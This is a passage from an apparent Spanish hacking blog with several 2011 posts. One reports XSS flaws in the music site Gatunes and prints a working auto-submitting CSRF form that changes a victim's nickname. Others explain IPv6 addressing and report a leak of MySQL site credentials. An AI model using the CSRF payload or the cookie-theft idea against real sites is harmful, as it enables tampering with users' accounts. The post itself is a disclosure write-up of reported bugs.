Publicado el 27/04/2011 12:04:00 en Bug Report. Total de votos: 4 Votar
Bueno, a día de hoy la mayoría conoceréis
Gatunes, esa web tipo Spotify, para escuchar música, compartir listas de reproducción… Vamos, lo que viene siendo una red social de música. La idea, en principio, es muy sencilla: Obtiene la música desde los vídeos de YouTube. Podemos obtener más información acerca de Gatunes
aquí.
Pasemos a lo que nos interesa…
Gatunes tiene infinidad de vulnerabilidades
Cross-site scripting (XSS), en el nick, en los comentarios, en la búsqueda de música… La web es, prácticamente, un desastre en este sentido.
Algunos de estos XSS son persistentes, por lo que los podemos utilizar para obtener cookies, sacar un simple alert… Pero también podemos utilizarlos para realizar un ataque
Cross-site request forgery (XSRF o CSRF). Un ejemplo, para simplemente cambiar el nick de la víctima, sería la siguiente (gracias a JKS por el código):
<!-- C0ded by JKS :$ TQ kr0no jaja-->
<body onload="document.forms[0].submit()">
<form action="http://gatunes.com/" method="post">
<input name="f" type="hidden" value="save_settings_personal" />
<input name="fullname" type="hidden" value="ka0labs XSRF" />
<input name="nick" type="hidden" value="ka0labs XSRF" />
</form>
Cuando la víctima entrara, este código le cambiaría su nick por “ka0labs XSRF”.
Obviamente, no solo se puede cambiar el nick, se pueden hacer muchísimas cosas, y los límites están prácticamente en la imaginación del atacante.
Para acabar, decir que los bugs han sido notificados, y algunos, arreglados (aunque no nos han dicho ni un "Gracias"), pero aún tienen muchísimos más fallos de este mismo tipo.
Podría extender mucho más la entrada explicando mejor cada cosa, pero tengo prisa, así que así se queda ;)
Ah, y gracias a JKS por ayudarme en algunos ejemplos prácticos.
Comentarios: 6 | Leer comentariosPublicado el 04/04/2011 12:04:00 en Off Topic.
Pues eso, que he borrado todos los posts irrelevantes y lammeradas que tenía! Así como los reportes de SQLi y XSS de otras webs.
Bytes
Comentarios: 2 | Leer comentariosPublicado el 03/04/2011 12:04:00 en Redes. Total de votos: 7 Votar
La dificultad de conseguir direcciones públicas IPv4 ha hecho que los organismos internacionales de estándares se hayan propuesto renovar el protocolo IP para admitir un rango de direccionamiento mucho más extenso. IPv6 viene a corregir este problema además de muchos otros relacionados con las mejoras en el encaminamiento de paquetes.
Aquí vamos a ver cómo son los paquetes IPv6 y su sistema de direccionamiento, intentando establecer analogías con el ya conocido IPv4.
En IPv6 se definen tres tipos de direcciones, todas de 128 bits de longitud:
Unicast: son direcciones que se aplican a una única interfaz de red. Cuando un paquete es enviado a una dirección unicast, este se entrega al único interfaz de red que posee esa dirección. Las direcciones unicast son, por tanto, únicas en la red.
Anycast: es una dirección que identifica a un conjunto de interfaces, posiblemente a diferentes nodos. Un paquete enviado a una dirección anycast será entregado en una (y solo una) de las interfaces que comparten la dirección anycast. Las direcciones anycast permiten crear ámbitos de redundancia. Por ejemplo, si en la instalación disponemos de dos enrutadores IPv6, podemos configurarlos con una única dirección anycast que los englobe a ambos y dirigir las eticiones de los clientes a esta única dirección compartida: alguno de los dos enrutadores atenderá la petición del cliente. Si uno de los enrutadores pierde su funcionalidad, el otro enrutador escuchará y atenderá todas las peticiones.
Multicast: También es una dirección que identifica a un conjunto de intergaces, pero en este caso, cuando un paquete es enviado a una dirección multicast, el paquete será entregado en todas y cada una de las interfaces que posean esa dirección multicast y que estén operativas. Una dirección multicast es la apropiada para efectuar las retransmisiones de broadcasting.
Una interfaz debe tener al menos una dirección unicast única, pero además de esta dirección puede tener otras de tipo unicast, anycast o multicast.
Representación de direcciones IPv6
Una dirección IPv6 se puede escribir de modo genérico con una secuencia del tipo X:X:X:X:X:X:X:X donde X representa un valor hexadecimal de 16 bits, que típicamente se numera con cuatro dígitos hexadecimales. Por ejemplo, una dirección IPv6 válida sería:
FF01:0000:0000:0A00:12DF:0000:0144:0001
Cada elemento de cuatro dígitos hexadecimales o 16 dígitos binarios se puede resumir. Por ejemplo, la dirección anterior se puede abreviar en la forma:
FF01:0:0:A00:12DF:0:144:1
Cuando varios grupos d...
Continúa aquí...Comentarios: 4 | Leer comentariosPublicado el 27/03/2011 12:03:00 en Noticias. Total de votos: 6 Votar
Esta mañana Jackh4x0r ha decidido hacer pública una vulnerabilidad en las páginas de MySQL (.fr , .it , .de y .jp). Parece ser que había un parámetro vulnerable a Inyección SQL, que encontraron TinKode y Ne0h hace unos pocos meses (aquí el post, necesitas estar registrado).
También publicaron que era vulnerable a
XSS.
Jackh4xor ha publicado información sobre los peces gordos de MySQL: emails, contraseñas (crackeadas las más importantes), usuarios…
Desde
aquí podemos acceder al documento en pastebin.com
Que mala imagen da esto a MySQL, ¿no?
Comentarios: 5 | Leer comentarios![[x]](http://www.diosdelared.com/images/add.ico)
![[x]](http://ddlr.servepics.com/rd.php?go=http://a3.twimg.com/profile_images/1271444319/nophoto_reasonably_small.jpg "kr0no")
Nick: kr0no
![[x]](http://www.diosdelared.com/images/tecnico.jpg "Artículo técnico"){kind=small}
Gatunes, desastre en seguridad